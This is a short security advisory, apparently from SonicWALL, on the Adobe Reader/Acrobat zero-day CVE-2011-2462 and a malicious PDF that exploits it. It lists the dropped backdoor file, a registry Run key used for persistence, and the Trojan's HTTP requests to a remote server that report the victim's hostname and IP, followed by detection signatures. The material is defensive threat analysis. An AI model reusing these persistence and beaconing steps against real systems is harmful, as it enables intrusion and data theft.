Adobe Reader and Acrobat Zero Day exploit
SonicWALL UTM Research team found reports of a new zero-day vulnerability (CVE-2011-2462) in Adobe Reader and Acrobat affecting Windows, Mac OS X, and Unix operating systems. This U3D memory corruption vulnerability (CVE-2011-2462) could lead to application crash, and may potentially allow the attacker to gain control of the victim machine. Adobe issued a security advisory on December 6, 2011 warning the users about this flaw.
The malicious PDF file when opened performs the following activity on victim machine:
- It drops a backdoor Trojan on the target machine and runs it:
- (USER)Local Settingspretty.exe --- Detected as GAV: Wisp.A_2 (Trojan)
- Creates a registry entry to ensure that the backdoor Trojan runs on system reboot:
- HKCUSoftwareMicrosoftWindowsCurrentVersionRunoffice = "(USER)Local Settingspretty.exe"
- The dropped backdoor Trojan will further attempt to connect to a remote server prettyli(REMOVED)com and sends following requests:
- GET /asp/kys_allow_get.asp?s=https&name=getkys.kys&hostname=(HOSTNAME)-(IPADDRESS)-pretty20111122
- GET /ASP/KYS_ALLOW_PUT.ASP?s=https&TYPE=ptpretty.tmp&hostname=(HOSTNAME)-(IPADDRESS)-pretty20111122
SonicWALL UTM appliance provides protection against this threat via the following signatures:
- GAV: CVE-2011-2462.A (Exploit)
- IPS: Malformed PDF File 14b